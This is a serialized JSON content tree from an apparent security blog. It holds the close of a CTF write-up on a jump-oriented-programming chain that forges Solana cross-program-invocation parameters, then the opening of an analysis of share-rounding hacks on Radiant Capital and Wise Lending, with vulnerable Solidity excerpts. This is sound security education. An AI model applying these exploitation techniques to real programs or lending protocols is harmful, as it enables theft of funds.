":12244},{"type":26,"tag":137,"props":48016,"children":48017},{"style":6009},[48018],{"type":32,"value":17225},{"type":26,"tag":137,"props":48020,"children":48021},{"style":5601},[48022],{"type":32,"value":1108},{"type":26,"tag":137,"props":48024,"children":48025},{"style":5584},[48026],{"type":32,"value":48027},"signers_seeds_len",{"type":26,"tag":137,"props":48029,"children":48030},{"style":5590},[48031],{"type":32,"value":7072},{"type":26,"tag":137,"props":48033,"children":48034},{"style":6009},[48035],{"type":32,"value":8445},{"type":26,"tag":137,"props":48037,"children":48038},{"style":5601},[48039],{"type":32,"value":5671},{"type":26,"tag":137,"props":48041,"children":48042},{"style":5590},[48043],{"type":32,"value":16348},{"type":26,"tag":137,"props":48045,"children":48046},{"style":6009},[48047],{"type":32,"value":15788},{"type":26,"tag":35,"props":48049,"children":48050},{},[48051,48053,48058,48060,48067],{"type":32,"value":48052},"The source of ",{"type":26,"tag":41,"props":48054,"children":48056},{"href":48055},"(https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L289)",[48057],{"type":32,"value":46668},{"type":32,"value":48059}," helps a lot, but looking at the actual ",{"type":26,"tag":41,"props":48061,"children":48064},{"href":48062,"rel":48063},"https://github.com/solana-labs/solana/blob/v1.17.4/programs/bpf_loader/src/syscalls/cpi.rs#L458-L637",[45],[48065],{"type":32,"value":48066},"implementation",{"type":32,"value":48068}," provides more clarity:",{"type":26,"tag":3426,"props":48070,"children":48071},{},[48072],{"type":26,"tag":3430,"props":48073,"children":48074},{},[48075,48080,48082,48089],{"type":26,"tag":130,"props":48076,"children":48078},{"className":48077},[],[48079],{"type":32,"value":47935},{"type":32,"value":48081}," points to a ",{"type":26,"tag":41,"props":48083,"children":48086},{"href":48084,"rel":48085},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/stable_layout/stable_instruction.rs#L33",[45],[48087],{"type":32,"value":48088},"StableInstruction",{"type":32,"value":7072},{"type":26,"tag":35,"props":48091,"children":48092},{},[48093],{"type":26,"tag":2210,"props":48094,"children":48096},{"alt":48088,"src":48095},"/posts/jumping-around-in-the-vm/stable_ix.svg",[],{"type":26,"tag":3426,"props":48098,"children":48099},{},[48100,48125],{"type":26,"tag":3430,"props":48101,"children":48102},{},[48103,48108,48110,48115,48117,48124],{"type":26,"tag":130,"props":48104,"children":48106},{"className":48105},[],[48107],{"type":32,"value":47960},{"type":32,"value":48109}," points to a slice of ",{"type":26,"tag":130,"props":48111,"children":48113},{"className":48112},[],[48114],{"type":32,"value":47985},{"type":32,"value":48116},"  ",{"type":26,"tag":41,"props":48118,"children":48121},{"href":48119,"rel":48120},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/account_info.rs#L19-L36",[45],[48122],{"type":32,"value":48123},"AccountInfos",{"type":32,"value":470},{"type":26,"tag":3430,"props":48126,"children":48127},{},[48128,48133,48135,48140,48142,48147],{"type":26,"tag":130,"props":48129,"children":48131},{"className":48130},[],[48132],{"type":32,"value":48002},{"type":32,"value":48134}," is a bit trickier, it points to a slice of length ",{"type":26,"tag":130,"props":48136,"children":48138},{"className":48137},[],[48139],{"type":32,"value":48027},{"type":32,"value":48141},", containing slices of ",{"type":26,"tag":130,"props":48143,"children":48145},{"className":48144},[],[48146],{"type":32,"value":6012},{"type":32,"value":470},{"type":26,"tag":35,"props":48149,"children":48150},{},[48151],{"type":26,"tag":2210,"props":48152,"children":48155},{"alt":48153,"src":48154},"signers.drawio","/posts/jumping-around-in-the-vm/signers.svg",[],{"type":26,"tag":35,"props":48157,"children":48158},{},[48159,48161,48166],{"type":32,"value":48160},"Where do we store those fake parameters? We can store them directly inside the input data, and just write the pointers to them on the stack through the write gadget. Note that these writes are to ",{"type":26,"tag":762,"props":48162,"children":48163},{},[48164],{"type":32,"value":48165},"future call frames",{"type":32,"value":470},{"type":26,"tag":35,"props":48168,"children":48169},{},[48170,48172,48179],{"type":32,"value":48171},"Now that we have all the parts, all we need is to string it together. The full ",{"type":26,"tag":41,"props":48173,"children":48176},{"href":48174,"rel":48175},"https://github.com/chen-robert/paradigmctf-2023/blob/main/jotterp/framework-solve/src/main.rs",[45],[48177],{"type":32,"value":48178},"reference solution can be found here",{"type":32,"value":470},{"type":26,"tag":35,"props":48181,"children":48182},{},[48183],{"type":32,"value":48184},"Here's a visualization of the final JOP chain.",{"type":26,"tag":5512,"props":48186,"children":48188},{"className":46550,"code":48187,"language":46552,"meta":7,"style":7},"graph BT\n    A[0: entrypoint] --> B[1: process_instruction]\n    B --> C[2: process]\n    C --> D[3: Write account_infos.ptr to target_r10 - 136]\n    C --> E[3: process]\n    E --> F[4: Write account_infos.len to target_r10 - 128]\n    E --> G[4: process]\n    G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n    G --> I[5: process]\n    I --> J[6: Write signers_seeds.len to target_r10 - 144]\n    I --> K[6: process]\n    K --> M[7: Write HeapBase to target_r10 - 120]\n    K --> N[7: process]\n    N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n    N --> O[8: Write 0x4337 to the account]\n",[48189],{"type":26,"tag":130,"props":48190,"children":48191},{"__ignoreMap":7},[48192,48200,48207,48214,48222,48229,48237,48245,48253,48261,48269,48277,48285,48293,48301],{"type":26,"tag":137,"props":48193,"children":48194},{"class":5559,"line":5560},[48195],{"type":26,"tag":137,"props":48196,"children":48197},{},[48198],{"type":32,"value":48199},"graph BT\n",{"type":26,"tag":137,"props":48201,"children":48202},{"class":5559,"line":5412},[48203],{"type":26,"tag":137,"props":48204,"children":48205},{},[48206],{"type":32,"value":46572},{"type":26,"tag":137,"props":48208,"children":48209},{"class":5559,"line":5417},[48210],{"type":26,"tag":137,"props":48211,"children":48212},{},[48213],{"type":32,"value":46580},{"type":26,"tag":137,"props":48215,"children":48216},{"class":5559,"line":5642},[48217],{"type":26,"tag":137,"props":48218,"children":48219},{},[48220],{"type":32,"value":48221},"    C --> D[3: Write account_infos.ptr to target_r10 - 136]\n",{"type":26,"tag":137,"props":48223,"children":48224},{"class":5559,"line":5745},[48225],{"type":26,"tag":137,"props":48226,"children":48227},{},[48228],{"type":32,"value":46596},{"type":26,"tag":137,"props":48230,"children":48231},{"class":5559,"line":5850},[48232],{"type":26,"tag":137,"props":48233,"children":48234},{},[48235],{"type":32,"value":48236},"    E --> F[4: Write account_infos.len to target_r10 - 128]\n",{"type":26,"tag":137,"props":48238,"children":48239},{"class":5559,"line":5878},[48240],{"type":26,"tag":137,"props":48241,"children":48242},{},[48243],{"type":32,"value":48244},"    E --> G[4: process]\n",{"type":26,"tag":137,"props":48246,"children":48247},{"class":5559,"line":5891},[48248],{"type":26,"tag":137,"props":48249,"children":48250},{},[48251],{"type":32,"value":48252},"    G --> H[5: Write signers_seeds.ptr to target_r10 - 152]\n",{"type":26,"tag":137,"props":48254,"children":48255},{"class":5559,"line":5909},[48256],{"type":26,"tag":137,"props":48257,"children":48258},{},[48259],{"type":32,"value":48260},"    G --> I[5: process]\n",{"type":26,"tag":137,"props":48262,"children":48263},{"class":5559,"line":5930},[48264],{"type":26,"tag":137,"props":48265,"children":48266},{},[48267],{"type":32,"value":48268},"    I --> J[6: Write signers_seeds.len to target_r10 - 144]\n",{"type":26,"tag":137,"props":48270,"children":48271},{"class":5559,"line":5939},[48272],{"type":26,"tag":137,"props":48273,"children":48274},{},[48275],{"type":32,"value":48276},"    I --> K[6: process]\n",{"type":26,"tag":137,"props":48278,"children":48279},{"class":5559,"line":6191},[48280],{"type":26,"tag":137,"props":48281,"children":48282},{},[48283],{"type":32,"value":48284},"    K --> M[7: Write HeapBase to target_r10 - 120]\n",{"type":26,"tag":137,"props":48286,"children":48287},{"class":5559,"line":6208},[48288],{"type":26,"tag":137,"props":48289,"children":48290},{},[48291],{"type":32,"value":48292},"    K --> N[7: process]\n",{"type":26,"tag":137,"props":48294,"children":48295},{"class":5559,"line":6225},[48296],{"type":26,"tag":137,"props":48297,"children":48298},{},[48299],{"type":32,"value":48300},"    N --> P[8: Invoke CPI Gadget with R0 pointing to the CreateAccount instruction]\n",{"type":26,"tag":137,"props":48302,"children":48303},{"class":5559,"line":6238},[48304],{"type":26,"tag":137,"props":48305,"children":48306},{},[48307],{"type":32,"value":48308},"    N --> O[8: Write 0x4337 to the account]\n",{"type":26,"tag":35,"props":48310,"children":48311},{},[48312,48314,48320],{"type":32,"value":48313},"Small note: ",{"type":26,"tag":130,"props":48315,"children":48317},{"className":48316},[],[48318],{"type":32,"value":48319},"target_r10",{"type":32,"value":48321}," is the address of the call frame when the CPI gadget is invoked, which, as shown in the graph, is the 8th frame. Its address can be calculated as follows:",{"type":26,"tag":5512,"props":48323,"children":48325},{"className":5552,"code":48324,"language":5551,"meta":7,"style":7},"fn call_frame_addr(depth: u64) -> u64 {\n    0x200000000 + 0x2000 * depth + 0x1000\n}\n// call_frame_addr(8) = 0x200011000\n",[48326],{"type":26,"tag":130,"props":48327,"children":48328},{"__ignoreMap":7},[48329,48374,48409,48416],{"type":26,"tag":137,"props":48330,"children":48331},{"class":5559,"line":5560},[48332,48336,48341,48345,48350,48354,48358,48362,48366,48370],{"type":26,"tag":137,"props":48333,"children":48334},{"style":5573},[48335],{"type":32,"value":22860},{"type":26,"tag":137,"props":48337,"children":48338},{"style":5682},[48339],{"type":32,"value":48340}," call_frame_addr",{"type":26,"tag":137,"props":48342,"children":48343},{"style":5601},[48344],{"type":32,"value":165},{"type":26,"tag":137,"props":48346,"children":48347},{"style":5584},[48348],{"type":32,"value":48349},"depth",{"type":26,"tag":137,"props":48351,"children":48352},{"style":5590},[48353],{"type":32,"value":7072},{"type":26,"tag":137,"props":48355,"children":48356},{"style":6009},[48357],{"type":32,"value":8445},{"type":26,"tag":137,"props":48359,"children":48360},{"style":5601},[48361],{"type":32,"value":5671},{"type":26,"tag":137,"props":48363,"children":48364},{"style":5590},[48365],{"type":32,"value":16348},{"type":26,"tag":137,"props":48367,"children":48368},{"style":6009},[48369],{"type":32,"value":8445},{"type":26,"tag":137,"props":48371,"children":48372},{"style":5601},[48373],{"type":32,"value":5875},{"type":26,"tag":137,"props":48375,"children":48376},{"class":5559,"line":5412},[48377,48382,48386,48391,48395,48400,48404],{"type":26,"tag":137,"props":48378,"children":48379},{"style":5626},[48380],{"type":32,"value":48381},"    0x200000000",{"type":26,"tag":137,"props":48383,"children":48384},{"style":5590},[48385],{"type":32,"value":11491},{"type":26,"tag":137,"props":48387,"children":48388},{"style":5626},[48389],{"type":32,"value":48390}," 0x2000",{"type":26,"tag":137,"props":48392,"children":48393},{"style":5590},[48394],{"type":32,"value":12406},{"type":26,"tag":137,"props":48396,"children":48397},{"style":5584},[48398],{"type":32,"value":48399}," depth",{"type":26,"tag":137,"props":48401,"children":48402},{"style":5590},[48403],{"type":32,"value":11491},{"type":26,"tag":137,"props":48405,"children":48406},{"style":5626},[48407],{"type":32,"value":48408}," 0x1000\n",{"type":26,"tag":137,"props":48410,"children":48411},{"class":5559,"line":5417},[48412],{"type":26,"tag":137,"props":48413,"children":48414},{"style":5601},[48415],{"type":32,"value":6507},{"type":26,"tag":137,"props":48417,"children":48418},{"class":5559,"line":5642},[48419],{"type":26,"tag":137,"props":48420,"children":48421},{"style":5564},[48422],{"type":32,"value":48423},"// call_frame_addr(8) = 0x200011000\n",{"type":26,"tag":92,"props":48425,"children":48426},{"id":31526},[48427],{"type":32,"value":21540},{"type":26,"tag":35,"props":48429,"children":48430},{},[48431,48433,48440],{"type":32,"value":48432},"Most blockchain vulnerabilities are high-level business logic bugs. While low-level Solana bugs are rare, ",{"type":26,"tag":41,"props":48434,"children":48437},{"href":48435,"rel":48436},"https://osec.io/blog/2022-12-09-rust-realloc-and-references",[45],[48438],{"type":32,"value":48439},"they do exist",{"type":32,"value":470},{"type":26,"tag":35,"props":48442,"children":48443},{},[48444],{"type":32,"value":48445},"In this blog post, we provided an exploration of the exploitation side of security. There's a surprising amount of work necessary to go from powerful memory corruption primitives to full control of the program.",{"type":26,"tag":35,"props":48447,"children":48448},{},[48449,48451,48456],{"type":32,"value":48450},"Security requires a top-to-bottom understanding of the execution environment. We hope this challenge and blog post motivate others to understand the ",{"type":26,"tag":762,"props":48452,"children":48453},{},[48454],{"type":32,"value":48455},"entire",{"type":32,"value":48457}," runtime.",{"type":26,"tag":7949,"props":48459,"children":48460},{},[48461],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":48463},[48464,48468,48469,48472],{"id":21549,"depth":5412,"text":21552,"children":48465},[48466,48467],{"id":43138,"depth":5417,"text":43141},{"id":44457,"depth":5417,"text":44460},{"id":45696,"depth":5412,"text":45699},{"id":46532,"depth":5412,"text":46535,"children":48470},[48471],{"id":46646,"depth":5417,"text":46649},{"id":31526,"depth":5412,"text":21540},"content:blog:2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm.md","blog/2023-12-11-jumping-around-in-the-vm",{"_path":48477,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":48478,"description":48479,"author":48480,"image":48481,"date":48483,"isFeatured":18,"onBlogPage":18,"body":48484,"_type":5433,"_id":49630,"_source":5435,"_file":49631,"_stem":49632,"_extension":5438},"/blog/2024-01-18-rounding-bugs","Rounding Bugs: An Analysis","Rounding-related hacks are having a moment in the spotlight. We explore these exploits, correct some popular misunderstandings, and provide mitigations.",[8304],{"src":48482},"/posts/rounding-bugs/cover.png","2024-01-18",{"type":23,"children":48485,"toc":49619},[48486,48490,48518,48523,48536,48541,48547,48552,48557,48562,48567,48580,48592,48612,48632,48637,48642,48660,48666,48671,48677,48691,48704,48709,48715,48729,48734,48756,48989,48994,48999,49012,49252,49262,49267,49273,49278,49283,49316,49321,49332,49338,49343,49357,49485,49499,49575,49580,49591,49596,49601,49605,49610,49615],{"type":26,"tag":92,"props":48487,"children":48488},{"id":31609},[48489],{"type":32,"value":31612},{"type":26,"tag":35,"props":48491,"children":48492},{},[48493,48495,48502,48503,48510,48512,48517],{"type":32,"value":48494},"Recently, there's been a series of attacks exploiting share rounding against lending protocols. Rounding attacks are already known to developers on ",{"type":26,"tag":41,"props":48496,"children":48499},{"href":48497,"rel":48498},"https://neodyme.io/de/blog/lending_disclosure",[45],[48500],{"type":32,"value":48501},"fast",{"type":32,"value":1108},{"type":26,"tag":41,"props":48504,"children":48507},{"href":48505,"rel":48506},"https://osec.io/blog/2022-04-26-spl-swap-rounding",[45],[48508],{"type":32,"value":48509},"cheap",{"type":32,"value":48511}," chains with high-value tokens. These attacks are novel in that they also work against low-value tokens on expensive chains. ",{"type":26,"tag":762,"props":48513,"children":48514},{},[48515],{"type":32,"value":48516},"Most people haven't considered what happens when shares are worth a lot",{"type":32,"value":470},{"type":26,"tag":35,"props":48519,"children":48520},{},[48521],{"type":32,"value":48522},"Much of the previous discourse has mischaracterized the rootcause of these hacks. For example, the presence of flashloans is largely irrelevant. At a high level, these attacks only require two key steps:",{"type":26,"tag":4820,"props":48524,"children":48525},{},[48526,48531],{"type":26,"tag":3430,"props":48527,"children":48528},{},[48529],{"type":32,"value":48530},"Inflate share value (token to share conversion rate)",{"type":26,"tag":3430,"props":48532,"children":48533},{},[48534],{"type":32,"value":48535},"Exploit rounding bug",{"type":26,"tag":35,"props":48537,"children":48538},{},[48539],{"type":32,"value":48540},"In this blog post, we explore these attacks in detail and provide potential mitigations.",{"type":26,"tag":92,"props":48542,"children":48544},{"id":48543},"model",[48545],{"type":32,"value":48546},"Model",{"type":26,"tag":35,"props":48548,"children":48549},{},[48550],{"type":32,"value":48551},"Before we dive in, there's some helpful background information we'll share first.",{"type":26,"tag":35,"props":48553,"children":48554},{},[48555],{"type":32,"value":48556},"A common form of accounting is the share and token model. When a user deposits a token, they receive back shares. Shares can accrue value, whether through interest or protocol fees.",{"type":26,"tag":35,"props":48558,"children":48559},{},[48560],{"type":32,"value":48561},"When users want to withdraw their tokens, they burn shares and receive the corresponding amount of tokens back. This is nice in theory. Unfortunately, in the real world, we have fixed precision. You can't have 1.01 shares, it needs to be either one or two. Which way should we round?",{"type":26,"tag":35,"props":48563,"children":48564},{},[48565],{"type":32,"value":48566},"This question is more complex than it may appear. Let's walk through an example.",{"type":26,"tag":35,"props":48568,"children":48569},{},[48570,48572,48578],{"type":32,"value":48571},"Say we initialize shares and tokens in a one-to-one ratio. After an initial deposit of 1000 tokens, the pool state is ",{"type":26,"tag":130,"props":48573,"children":48575},{"className":48574},[],[48576],{"type":32,"value":48577},"1000:1000",{"type":32,"value":48579}," (1000 tokens to 1000 shares).",{"type":26,"tag":35,"props":48581,"children":48582},{},[48583,48585,48591],{"type":32,"value":48584},"After accruing fees, the pool gains one token for a new ratio of ",{"type":26,"tag":130,"props":48586,"children":48588},{"className":48587},[],[48589],{"type":32,"value":48590},"1001:1000",{"type":32,"value":470},{"type":26,"tag":35,"props":48593,"children":48594},{},[48595,48597,48603,48605,48610],{"type":32,"value":48596},"How many tokens should we get back when withdrawing 999 shares? The real answer is ",{"type":26,"tag":130,"props":48598,"children":48600},{"className":48599},[],[48601],{"type":32,"value":48602},"1001/1000*999 = 999.999",{"type":32,"value":48604},". Unfortunately, we can only send the user 1000 or 999 tokens. For now, let's assume we round ",{"type":26,"tag":762,"props":48606,"children":48607},{},[48608],{"type":32,"value":48609},"down",{"type":32,"value":48611}," against the user.",{"type":26,"tag":35,"props":48613,"children":48614},{},[48615,48617,48623,48625,48631],{"type":32,"value":48616},"If we give the user 999 tokens, the new pool state is ",{"type":26,"tag":130,"props":48618,"children":48620},{"className":48619},[],[48621],{"type":32,"value":48622},"2:1",{"type":32,"value":48624},". The value of a share doubled! What happens if we deposit 1 more token? We'll get back zero shares, further inflating the ratio to ",{"type":26,"tag":130,"props":48626,"children":48628},{"className":48627},[],[48629],{"type":32,"value":48630},"3:1",{"type":32,"value":470},{"type":26,"tag":35,"props":48633,"children":48634},{},[48635],{"type":32,"value":48636},"Small decisions like rounding direction can have a big impact on share valuation. Generally, share valuation isn't a strict security boundary.",{"type":26,"tag":35,"props":48638,"children":48639},{},[48640],{"type":32,"value":48641},"The above is a bit of a simplification. In practice, there are several protocol-specific design decisions:",{"type":26,"tag":4820,"props":48643,"children":48644},{},[48645,48650,48655],{"type":26,"tag":3430,"props":48646,"children":48647},{},[48648],{"type":32,"value":48649},"Can you deposit and receive back zero shares? If not, you'll need to spend more effort to exploit the rounding error",{"type":26,"tag":3430,"props":48651,"children":48652},{},[48653],{"type":32,"value":48654},"When you withdraw, are you withdrawing shares or tokens?",{"type":26,"tag":3430,"props":48656,"children":48657},{},[48658],{"type":32,"value":48659},"Can you directly manipulate pool state by sending tokens? Hopefully not.",{"type":26,"tag":92,"props":48661,"children":48663},{"id":48662},"decisions",[48664],{"type":32,"value":48665},"Decisions",{"type":26,"tag":35,"props":48667,"children":48668},{},[48669],{"type":32,"value":48670},"Let's assume that we're able to inflate the value of a share. How can we actually exploit this?",{"type":26,"tag":118,"props":48672,"children":48674},{"id":48673},"radiant-capital",[48675],{"type":32,"value":48676},"Radiant Capital",{"type":26,"tag":35,"props":48678,"children":48679},{},[48680,48682,48689],{"type":32,"value":48681},"Radiant Capital was ",{"type":26,"tag":41,"props":48683,"children":48686},{"href":48684,"rel":48685},"https://arbiscan.io/tx/0x1ce7e9a9e3b6dd3293c9067221ac3260858ce119ecb7ca860eac28b2474c7c9b",[45],[48687],{"type":32,"value":48688},"hacked on Jan 2nd",{"type":32,"value":48690}," for about $4.5M. This was the original example of exploiting rounding on otherwise inconsequential shares.",{"type":26,"tag":35,"props":48692,"children":48693},{},[48694,48696,48703],{"type":32,"value":48695},"The exploit is relatively straightforward and ",{"type":26,"tag":41,"props":48697,"children":48700},{"href":48698,"rel":48699},"https://medium.com/@_kcyw/radiant-capital-hack-explained-1633289be150",[45],[48701],{"type":32,"value":48702},"has already been covered previously",{"type":32,"value":470},{"type":26,"tag":35,"props":48705,"children":48706},{},[48707],{"type":32,"value":48708},"At a high level, this exploit is exactly what you'd expect. If shares were worth $1000 each, and the user tried to withdraw $1999, they only needed to burn one share. Free money.",{"type":26,"tag":118,"props":48710,"children":48712},{"id":48711},"wise-lending",[48713],{"type":32,"value":48714},"Wise Lending",{"type":26,"tag":35,"props":48716,"children":48717},{},[48718,48720,48727],{"type":32,"value":48719},"Wise Lending was ",{"type":26,"tag":41,"props":48721,"children":48724},{"href":48722,"rel":48723},"https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31",[45],[48725],{"type":32,"value":48726},"hacked on January 13th",{"type":32,"value":48728}," for just under $460,000.",{"type":26,"tag":35,"props":48730,"children":48731},{},[48732],{"type":32,"value":48733},"Again, share prices were inflated artificially high. However, the rounding direction seemed to be correct. This was a new variant.",{"type":26,"tag":35,"props":48735,"children":48736},{},[48737,48739,48746,48748,48755],{"type":32,"value":48738},"This is ",{"type":26,"tag":41,"props":48740,"children":48743},{"href":48741,"rel":48742},"https://etherscan.io/address/0x829c3AE2e82760eCEaD0F384918a650F8a31Ba18",[45],[48744],{"type":32,"value":48745},"the code responsible",{"type":32,"value":48747}," for checking if a withdrawal is valid. As a hint, a critical invariant for lending protocols is that there's ",{"type":26,"tag":41,"props":48749,"children":48752},{"href":48750,"rel":48751},"https://www.chainalysis.com/blog/euler-finance-flash-loan-attack/",[45],[48753],{"type":32,"value":48754},"no way to atomically self-bankrupt",{"type":32,"value":470},{"type":26,"tag":5512,"props":48757,"children":48759},{"className":7055,"code":48758,"language":7054,"meta":7,"style":7},"uint256 withdrawValue = WISE_ORACLE.getTokensInETH(\n    _poolToken,\n    _amount\n)\n    * WISE_LENDING.lendingPoolData(_poolToken).collateralFactor\n    / PRECISION_FACTOR_E18;\n\nbool state = borrowPercentageCap\n    * (overallETHCollateralsWeighted(_nftId) - withdrawValue)\n    / PRECISION_FACTOR_E18\n    \u003C borrowAmount;\n\nif (state == true) {\n    revert ResultsInBadDebt();\n}\n",[48760],{"type":26,"tag":130,"props":48761,"children":48762},{"__ignoreMap":7},[48763,48794,48802,48810,48817,48839,48852,48859,48880,48910,48922,48934,48941,48965,48982],{"type":26,"tag":137,"props":48764,"children":48765},{"class":5559,"line":5560},[48766,48771,48776,48780,48785,48790],{"type":26,"tag":137,"props":48767,"children":48768},{"style":6009},[48769],{"type":32,"value":48770},"uint256",{"type":26,"tag":137,"props":48772,"children":48773},{"style":5601},[48774],{"type":32,"value":48775}," withdrawValue ",{"type":26,"tag":137,"props":48777,"children":48778},{"style":5590},[48779],{"type":32,"value":289},{"type":26,"tag":137,"props":48781,"children":48782},{"style":5601},[48783],{"type":32,"value":48784}," WISE_ORACLE.",{"type":26,"tag":137,"props":48786,"children":48787},{"style":5682},[48788],{"type":32,"value":48789},"getTokensInETH",{"type":26,"tag":137,"props":48791,"children":48792},{"style":5601},[48793],{"type":32,"value":6054},{"type":26,"tag":137,"props":48795,"children":48796},{"class":5559,"line":5412},[48797],{"type":26,"tag":137,"props":48798,"children":48799},{"style":5601},[48800],{"type":32,"value":48801},"    _poolToken,\n",{"type":26,"tag":137,"props":48803,"children":48804},{"class":5559,"line":5417},[48805],{"type":26,"tag":137,"props":48806,"children":48807},{"style":5601},[48808],{"type":32,"value":48809},"    _amount\n",{"type":26,"tag":137,"props":48811,"children":48812},{"class":5559,"line":5642},[48813],{"type":26,"tag":137,"props":48814,"children":48815},{"style":5601},[48816],{"type":32,"value":5742},{"type":26,"tag":137,"props":48818,"children":48819},{"class":5559,"line":5745},[48820,48824,48829,48834],{"type":26,"tag":137,"props":48821,"children":48822},{"style":5590},[48823],{"type":32,"value":20153},{"type":26,"tag":137,"props":48825,"children":48826},{"style":5601},[48827],{"type":32,"value":48828}," WISE_LENDING.",{"type":26,"tag":137,"props":48830,"children":48831},{"style":5682},[48832],{"type":32,"value":48833},"lendingPoolData",{"type":26,"tag":137,"props":48835,"children":48836},{"style":5601},[48837],{"type":32,"value":48838},"(_poolToken).collateralFactor\n",{"type":26,"tag":137,"props":48840,"children":48841},{"class":5559,"line":5850},[48842,48847],{"type":26,"tag":137,"props":48843,"children":48844},{"style":5590},[48845],{"type":32,"value":48846},"    /",{"type":26,"tag":137,"props":48848,"children":48849},{"style":5601},[48850],{"type":32,"value":48851}," PRECISION_FACTOR_E18;\n",{"type":26,"tag":137,"props":48853,"children":48854},{"class":5559,"line":5878},[48855],{"type":26,"tag":137,"props":48856,"children":48857},{"emptyLinePlaceholder":18},[48858],{"type":32,"value":6276},{"type":26,"tag":137,"props":48860,"children":48861},{"class":5559,"line":5891},[48862,48866,48871,48875],{"type":26,"tag":137,"props":48863,"children":48864},{"style":6009},[48865],{"type":32,"value":32279},{"type":26,"tag":137,"props":48867,"children":48868},{"style":5601},[48869],{"type":32,"value":48870}," state ",{"type":26,"tag":137,"props":48872,"children":48873},{"style":5590},[48874],{"type":32,"value":289},{"type":26,"tag":137,"props":48876,"children":48877},{"style":5601},[48878],{"type":32,"value":48879}," borrowPercentageCap\n",{"type":26,"tag":137,"props":48881,"children":48882},{"class":5559,"line":5909},[48883,48887,48891,48896,48901,48905],{"type":26,"tag":137,"props":48884,"children":48885},{"style":5590},[48886],{"type":32,"value":20153},{"type":26,"tag":137,"props":48888,"children":48889},{"style":5601},[48890],{"type":32,"value":4625},{"type":26,"tag":137,"props":48892,"children":48893},{"style":5682},[48894],{"type":32,"value":48895},"overallETHCollateralsWeighted",{"type":26,"tag":137,"props":48897,"children":48898},{"style":5601},[48899],{"type":32,"value":48900},"(_nftId) ",{"type":26,"tag":137,"props":48902,"children":48903},{"style":5590},[48904],{"type":32,"value":6908},{"type":26,"tag":137,"props":48906,"children":48907},{"style":5601},[48908],{"type":32,"value":48909}," withdrawValue)\n",{"type":26,"tag":137,"props":48911,"children":48912},{"class":5559,"line":5930},[48913,48917],{"type":26,"tag":137,"props":48914,"children":48915},{"style":5590},[48916],{"type":32,"value":48846},{"type":26,"tag":137,"props":48918,"children":48919},{"style":5601},[48920],{"type":32,"value":48921}," PRECISION_FACTOR_E18\n",{"type":26,"tag":137,"props":48923,"children":48924},{"class":5559,"line":5939},[48925,48929],{"type":26,"tag":137,"props":48926,"children":48927},{"style":5590},[48928],{"type":32,"value":35041},{"type":26,"tag":137,"props":48930,"children":48931},{"style":5601},[48932],{"type":32,"value":48933}," borrowAmount;\n",{"type":26,"tag":137,"props":48935,"children":48936},{"class":5559,"line":6191},[48937],{"type":26,"tag":137,"props":48938,"children":48939},{"emptyLinePlaceholder":18},[48940],{"type":32,"value":6276},{"type":26,"tag":137,"props":48942,"children":48943},{"class":5559,"line":6208},[48944,48948,48953,48957,48961],{"type":26,"tag":137,"props":48945,"children":48946},{"style":5610},[48947],{"type":32,"value":18171},{"type":26,"tag":137,"props":48949,"children":48950},{"style":5601},[48951],{"type":32,"value":48952}," (state ",{"type":26,"tag":137,"props":48954,"children":48955},{"style":5590},[48956],{"type":32,"value":11161},{"type":26,"tag":137,"props":48958,"children":48959},{"style":5573},[48960],{"type":32,"value":15060},{"type":26,"tag":137,"props":48962,"children":48963},{"style":5601},[48964],{"type":32,"value":17395},{"type":26,"tag":137,"props":48966,"children":48967},{"class":5559,"line":6225},[48968,48973,48978],{"type":26,"tag":137,"props":48969,"children":48970},{"style":5610},[48971],{"type":32,"value":48972},"    revert",{"type":26,"tag":137,"props":48974,"children":48975},{"style":5682},[48976],{"type":32,"value":48977}," ResultsInBadDebt",{"type":26,"tag":137,"props":48979,"children":48980},{"style":5601},[48981],{"type":32,"value":6267},{"type":26,"tag":137,"props":48983,"children":48984},{"class":5559,"line":6238},[48985],{"type":26,"tag":137,"props":48986,"children":48987},{"style":5601},[48988],{"type":32,"value":6507},{"type":26,"tag":35,"props":48990,"children":48991},{},[48992],{"type":32,"value":48993},"The critical observation is that this code operates on token amounts, while the internal accounting necessarily operates on shares.",{"type":26,"tag":35,"props":48995,"children":48996},{},[48997],{"type":32,"value":48998},"Consider: you have one share worth $1000 and (correctly) can borrow $500. If you tried to withdraw $1, the code would round up to withdraw your one share worth $1000, causing you to be immediately liquidatable!",{"type":26,"tag":35,"props":49000,"children":49001},{},[49002,49004,49010],{"type":32,"value":49003},"And indeed, ",{"type":26,"tag":41,"props":49005,"children":49008},{"href":49006,"rel":49007},"https://etherscan.io/address/0x37e49bf3749513A02FA535F0CbC383796E8107E4",[45],[49009],{"type":32,"value":48714},{"type":32,"value":49011}," rounds up the share value.",{"type":26,"tag":5512,"props":49013,"children":49015},{"className":7055,"code":49014,"language":7054,"meta":7,"style":7},"function _calculateShares(\n    uint256 _product,\n    uint256 _pseudo,\n    bool _maxSharePrice\n)\n    private\n    pure\n    returns (uint256)\n{\n    return _maxSharePrice == true\n        ? _product % _pseudo == 0\n            ? _product / _pseudo\n            : _product / _pseudo + 1\n        : _product / _pseudo;\n}\n",[49016],{"type":26,"tag":130,"props":49017,"children":49018},{"__ignoreMap":7},[49019,49035,49052,49068,49081,49088,49096,49104,49124,49131,49152,49173,49195,49224,49245],{"type":26,"tag":137,"props":49020,"children":49021},{"class":5559,"line":5560},[49022,49026,49031],{"type":26,"tag":137,"props":49023,"children":49024},{"style":5573},[49025],{"type":32,"value":33972},{"type":26,"tag":137,"props":49027,"children":49028},{"style":5682},[49029],{"type":32,"value":49030}," _calculateShares",{"type":26,"tag":137,"props":49032,"children":49033},{"style":5601},[49034],{"type":32,"value":6054},{"type":26,"tag":137,"props":49036,"children":49037},{"class":5559,"line":5412},[49038,49043,49048],{"type":26,"tag":137,"props":49039,"children":49040},{"style":6009},[49041],{"type":32,"value":49042},"    uint256",{"type":26,"tag":137,"props":49044,"children":49045},{"style":5584},[49046],{"type":32,"value":49047}," 